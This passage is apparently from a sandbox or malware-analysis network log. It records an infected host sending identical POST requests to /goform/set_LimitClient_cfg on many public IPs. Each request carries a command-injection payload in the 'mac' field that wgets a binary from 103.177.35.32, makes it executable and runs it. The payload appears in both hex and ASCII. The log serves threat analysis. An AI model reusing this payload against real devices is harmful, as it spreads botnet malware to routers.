                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3289192.168.2.233952647.122.209.528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540044069 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3290192.168.2.235244264.240.206.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540070057 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3291192.168.2.233995484.250.3.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540081024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3292192.168.2.2356976168.179.96.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540095091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3293192.168.2.2334210195.41.188.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540117025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3294192.168.2.234980267.77.62.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540138960 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3295192.168.2.233330825.118.221.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540167093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3296192.168.2.2345560175.83.246.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540205002 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3297192.168.2.2359972152.211.89.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540225029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3298192.168.2.233720882.136.65.1338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540246964 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3299192.168.2.235629897.224.50.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540278912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3300192.168.2.2337892203.187.76.2528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540286064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3301192.168.2.23511429.132.100.178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540308952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3302192.168.2.2342632111.232.168.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540318012 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3303192.168.2.2359746153.221.57.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540663958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3304192.168.2.2353836200.95.147.128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540679932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3305192.168.2.2349192197.61.41.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540777922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3306192.168.2.233729825.190.170.1328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540812969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3307192.168.2.233745494.108.195.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540841103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3308192.168.2.235321299.40.196.778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540874958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3309192.168.2.2341082119.156.63.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3310192.168.2.234218038.147.190.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3311192.168.2.2341606202.34.80.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3312192.168.2.2340120177.212.14.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3313192.168.2.236020678.124.243.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3314192.168.2.2356594217.179.9.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3315192.168.2.235618647.95.196.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3316192.168.2.23588889.32.116.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3317192.168.2.2339606185.17.80.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3318192.168.2.2354884164.29.83.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3319192.168.2.235471665.43.3.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3320192.168.2.2341852157.204.151.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3321192.168.2.2341400125.134.152.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3322192.168.2.2355828185.125.41.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3323192.168.2.23471929.227.2.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3324192.168.2.2346594207.112.103.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3325192.168.2.234986686.33.124.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3326192.168.2.2350480162.125.219.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3327192.168.2.233352663.5.49.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3328192.168.2.2347180161.111.191.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3329192.168.2.235138218.180.65.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3330192.168.2.235856813.209.135.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3331192.168.2.2335578157.85.195.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3332192.168.2.233443286.160.31.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3333192.168.2.2349926208.98.128.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3334192.168.2.2359958144.232.104.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3335192.168.2.235345259.81.108.1338080
                                                        TimestampBytes transferredDirectionData


